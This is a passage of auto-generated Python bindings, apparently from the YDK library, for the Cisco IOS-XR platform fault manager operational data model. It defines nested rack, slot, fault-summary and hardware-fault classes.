Faulty Hardware Device Version
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: condition_raised_timestamp
Fault Raised Timestamp
**type**\: str
**config**\: False
.. attribute:: process_id
Faulty Hardware Process ID
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: device_description
Faulty Hardware Device Description
**type**\: str
**config**\: False
.. attribute:: condition_severity
Faulty Hardware Condition Severity
**type**\: str
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, self).__init__()
self.yang_name = "hardware-fault-type"
self.yang_parent_name = "hardware-fault-device"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hw_fault_type']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('hw_fault_type', (YLeaf(YType.str, 'hw-fault-type'), ['str'])),
('condition_description', (YLeaf(YType.str, 'condition-description'), ['str'])),
('condition_name', (YLeaf(YType.str, 'condition-name'), ['str'])),
('device_key', (YLeaf(YType.str, 'device-key'), ['str'])),
('device_version', (YLeaf(YType.int32, 'device-version'), ['int'])),
('condition_raised_timestamp', (YLeaf(YType.str, 'condition-raised-timestamp'), ['str'])),
('process_id', (YLeaf(YType.int32, 'process-id'), ['int'])),
('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
('condition_severity', (YLeaf(YType.str, 'condition-severity'), ['str'])),
])
self.hw_fault_type = None
self.condition_description = None
self.condition_name = None
self.device_key = None
self.device_version = None
self.condition_raised_timestamp = None
self.process_id = None
self.device_description = None
self.condition_severity = None
self._segment_path = lambda: "hardware-fault-type" + "[hw-fault-type='" + str(self.hw_fault_type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, ['hw_fault_type', 'condition_description', 'condition_name', 'device_key', 'device_version', 'condition_raised_timestamp', 'process_id', 'device_description', 'condition_severity'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot.HardwareFaultDevices']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots.Slot']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack.Slots']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks.Rack']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3.Racks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s.FaultType3']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.FaultType3s']['meta_info']
class Racks(_Entity_):
"""
Table of racks
.. attribute:: rack
Number
**type**\: list of :py:class:`Rack <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks, self).__init__()
self.yang_name = "racks"
self.yang_parent_name = "fault-type2"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("rack", ("rack", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack))])
self._leafs = OrderedDict()
self.rack = YList(self)
self._segment_path = lambda: "racks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks, [], name, value)
class Rack(_Entity_):
"""
Number
.. attribute:: rack (key)
Rack number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: slots
Table of slots
**type**\: :py:class:`Slots <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack, self).__init__()
self.yang_name = "rack"
self.yang_parent_name = "racks"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['rack']
self._child_classes = OrderedDict([("slots", ("slots", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots))])
self._leafs = OrderedDict([
('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
])
self.rack = None
self.slots = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots()
self.slots.parent = self
self._children_name_map["slots"] = "slots"
self._segment_path = lambda: "rack" + "[rack='" + str(self.rack) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack, ['rack'], name, value)
class Slots(_Entity_):
"""
Table of slots
.. attribute:: slot
Name
**type**\: list of :py:class:`Slot <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots, self).__init__()
self.yang_name = "slots"
self.yang_parent_name = "rack"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("slot", ("slot", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot))])
self._leafs = OrderedDict()
self.slot = YList(self)
self._segment_path = lambda: "slots"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots, [], name, value)
class Slot(_Entity_):
"""
Name
.. attribute:: slot (key)
Slot name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: fault_summary
Table of Hardware Summary
**type**\: :py:class:`FaultSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.FaultSummary>`
**config**\: False
.. attribute:: hardware_fault_devices
Table of Hardware Failure
**type**\: :py:class:`HardwareFaultDevices <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot, self).__init__()
self.yang_name = "slot"
self.yang_parent_name = "slots"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['slot']
self._child_classes = OrderedDict([("fault-summary", ("fault_summary", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.FaultSummary)), ("hardware-fault-devices", ("hardware_fault_devices", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices))])
self._leafs = OrderedDict([
('slot', (YLeaf(YType.str, 'slot'), ['str'])),
])
self.slot = None
self.fault_summary = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.FaultSummary()
self.fault_summary.parent = self
self._children_name_map["fault_summary"] = "fault-summary"
self.hardware_fault_devices = PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices()
self.hardware_fault_devices.parent = self
self._children_name_map["hardware_fault_devices"] = "hardware-fault-devices"
self._segment_path = lambda: "slot" + "[slot='" + str(self.slot) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot, ['slot'], name, value)
class FaultSummary(_Entity_):
"""
Table of Hardware Summary
.. attribute:: severity_critical_count
Fault Severity Critical count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: severity_emergency_or_alert_count
Fault Severity Emergency count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: total
Faulty Hardware total count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: severity_error_count
Fault Severity Error count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.FaultSummary, self).__init__()
self.yang_name = "fault-summary"
self.yang_parent_name = "slot"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('severity_critical_count', (YLeaf(YType.int32, 'severity-critical-count'), ['int'])),
('severity_emergency_or_alert_count', (YLeaf(YType.int32, 'severity-emergency-or-alert-count'), ['int'])),
('total', (YLeaf(YType.int32, 'total'), ['int'])),
('severity_error_count', (YLeaf(YType.int32, 'severity-error-count'), ['int'])),
])
self.severity_critical_count = None
self.severity_emergency_or_alert_count = None
self.total = None
self.severity_error_count = None
self._segment_path = lambda: "fault-summary"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.FaultSummary, ['severity_critical_count', 'severity_emergency_or_alert_count', 'total', 'severity_error_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.FaultSummary']['meta_info']
class HardwareFaultDevices(_Entity_):
"""
Table of Hardware Failure
.. attribute:: hardware_fault_device
Table of Hardware Failure Device
**type**\: list of :py:class:`HardwareFaultDevice <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices, self).__init__()
self.yang_name = "hardware-fault-devices"
self.yang_parent_name = "slot"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("hardware-fault-device", ("hardware_fault_device", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice))])
self._leafs = OrderedDict()
self.hardware_fault_device = YList(self)
self._segment_path = lambda: "hardware-fault-devices"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices, [], name, value)
class HardwareFaultDevice(_Entity_):
"""
Table of Hardware Failure Device
.. attribute:: hw_fault_device (key)
hw fault device list
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: hardware_fault_type
Table of Hardware Failure Type
**type**\: list of :py:class:`HardwareFaultType <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, self).__init__()
self.yang_name = "hardware-fault-device"
self.yang_parent_name = "hardware-fault-devices"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hw_fault_device']
self._child_classes = OrderedDict([("hardware-fault-type", ("hardware_fault_type", PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType))])
self._leafs = OrderedDict([
('hw_fault_device', (YLeaf(YType.str, 'hw-fault-device'), ['str'])),
])
self.hw_fault_device = None
self.hardware_fault_type = YList(self)
self._segment_path = lambda: "hardware-fault-device" + "[hw-fault-device='" + str(self.hw_fault_device) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice, ['hw_fault_device'], name, value)
class HardwareFaultType(_Entity_):
"""
Table of Hardware Failure Type
.. attribute:: hw_fault_type (key)
hw fault type list
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: condition_description
Faulty Hardware Condition Description
**type**\: str
**config**\: False
.. attribute:: condition_name
Faulty Hardware Condition Name
**type**\: str
**config**\: False
.. attribute:: device_key
Faulty Hardware Device Key
**type**\: str
**config**\: False
.. attribute:: device_version
Faulty Hardware Device Version
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: condition_raised_timestamp
Fault Raised Timestamp
**type**\: str
**config**\: False
.. attribute:: process_id
Faulty Hardware Process ID
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: device_description
Faulty Hardware Device Description
**type**\: str
**config**\: False
.. attribute:: condition_severity
Faulty Hardware Condition Severity
**type**\: str
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, self).__init__()
self.yang_name = "hardware-fault-type"
self.yang_parent_name = "hardware-fault-device"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['hw_fault_type']
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('hw_fault_type', (YLeaf(YType.str, 'hw-fault-type'), ['str'])),
('condition_description', (YLeaf(YType.str, 'condition-description'), ['str'])),
('condition_name', (YLeaf(YType.str, 'condition-name'), ['str'])),
('device_key', (YLeaf(YType.str, 'device-key'), ['str'])),
('device_version', (YLeaf(YType.int32, 'device-version'), ['int'])),
('condition_raised_timestamp', (YLeaf(YType.str, 'condition-raised-timestamp'), ['str'])),
('process_id', (YLeaf(YType.int32, 'process-id'), ['int'])),
('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
('condition_severity', (YLeaf(YType.str, 'condition-severity'), ['str'])),
])
self.hw_fault_type = None
self.condition_description = None
self.condition_name = None
self.device_key = None
self.device_version = None
self.condition_raised_timestamp = None
self.process_id = None
self.device_description = None
self.condition_severity = None
self._segment_path = lambda: "hardware-fault-type" + "[hw-fault-type='" + str(self.hw_fault_type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType, ['hw_fault_type', 'condition_description', 'condition_name', 'device_key', 'device_version', 'condition_raised_timestamp', 'process_id', 'device_description', 'condition_severity'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice.HardwareFaultType']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot.HardwareFaultDevices']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots.Slot']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack.Slots']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks.Rack']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2.Racks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s.FaultType2']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.FaultType2s']['meta_info']
class Racks(_Entity_):
"""
Table of racks
.. attribute:: rack
Number
**type**\: list of :py:class:`Rack <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks, self).__init__()
self.yang_name = "racks"
self.yang_parent_name = "fault-type1"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("rack", ("rack", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack))])
self._leafs = OrderedDict()
self.rack = YList(self)
self._segment_path = lambda: "racks"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks, [], name, value)
class Rack(_Entity_):
"""
Number
.. attribute:: rack (key)
Rack number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: slots
Table of slots
**type**\: :py:class:`Slots <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack, self).__init__()
self.yang_name = "rack"
self.yang_parent_name = "racks"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['rack']
self._child_classes = OrderedDict([("slots", ("slots", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots))])
self._leafs = OrderedDict([
('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
])
self.rack = None
self.slots = PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots()
self.slots.parent = self
self._children_name_map["slots"] = "slots"
self._segment_path = lambda: "rack" + "[rack='" + str(self.rack) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack, ['rack'], name, value)
class Slots(_Entity_):
"""
Table of slots
.. attribute:: slot
Name
**type**\: list of :py:class:`Slot <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots, self).__init__()
self.yang_name = "slots"
self.yang_parent_name = "rack"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("slot", ("slot", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot))])
self._leafs = OrderedDict()
self.slot = YList(self)
self._segment_path = lambda: "slots"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots, [], name, value)
class Slot(_Entity_):
"""
Name
.. attribute:: slot (key)
Slot name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: fault_summary
Table of Hardware Summary
**type**\: :py:class:`FaultSummary <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.FaultSummary>`
**config**\: False
.. attribute:: hardware_fault_devices
Table of Hardware Failure
**type**\: :py:class:`HardwareFaultDevices <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot, self).__init__()
self.yang_name = "slot"
self.yang_parent_name = "slots"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['slot']
self._child_classes = OrderedDict([("fault-summary", ("fault_summary", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.FaultSummary)), ("hardware-fault-devices", ("hardware_fault_devices", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices))])
self._leafs = OrderedDict([
('slot', (YLeaf(YType.str, 'slot'), ['str'])),
])
self.slot = None
self.fault_summary = PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.FaultSummary()
self.fault_summary.parent = self
self._children_name_map["fault_summary"] = "fault-summary"
self.hardware_fault_devices = PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices()
self.hardware_fault_devices.parent = self
self._children_name_map["hardware_fault_devices"] = "hardware-fault-devices"
self._segment_path = lambda: "slot" + "[slot='" + str(self.slot) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot, ['slot'], name, value)
class FaultSummary(_Entity_):
"""
Table of Hardware Summary
.. attribute:: severity_critical_count
Fault Severity Critical count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: severity_emergency_or_alert_count
Fault Severity Emergency count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: total
Faulty Hardware total count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: severity_error_count
Fault Severity Error count
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.FaultSummary, self).__init__()
self.yang_name = "fault-summary"
self.yang_parent_name = "slot"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('severity_critical_count', (YLeaf(YType.int32, 'severity-critical-count'), ['int'])),
('severity_emergency_or_alert_count', (YLeaf(YType.int32, 'severity-emergency-or-alert-count'), ['int'])),
('total', (YLeaf(YType.int32, 'total'), ['int'])),
('severity_error_count', (YLeaf(YType.int32, 'severity-error-count'), ['int'])),
])
self.severity_critical_count = None
self.severity_emergency_or_alert_count = None
self.total = None
self.severity_error_count = None
self._segment_path = lambda: "fault-summary"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.FaultSummary, ['severity_critical_count', 'severity_emergency_or_alert_count', 'total', 'severity_error_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_pfm_oper as meta
return meta._meta_table['PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.FaultSummary']['meta_info']
class HardwareFaultDevices(_Entity_):
"""
Table of Hardware Failure
.. attribute:: hardware_fault_device
Table of Hardware Failure Device
**type**\: list of :py:class:`HardwareFaultDevice <ydk.models.cisco_ios_xr.Cisco_IOS_XR_pfm_oper.PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice>`
**config**\: False
"""
_prefix = 'pfm-oper'
_revision = '2017-03-28'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices, self).__init__()
self.yang_name = "hardware-fault-devices"
self.yang_parent_name = "slot"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("hardware-fault-device", ("hardware_fault_device", PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices.HardwareFaultDevice))])
self._leafs = OrderedDict()
self.hardware_fault_device = YList(self)
self._segment_path = lambda: "hardware-fault-devices"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(PlatformFaultManager.Exclude.FaultType1s.FaultType1.Racks.Rack.Slots.Slot.HardwareFaultDevices, [], name, value)
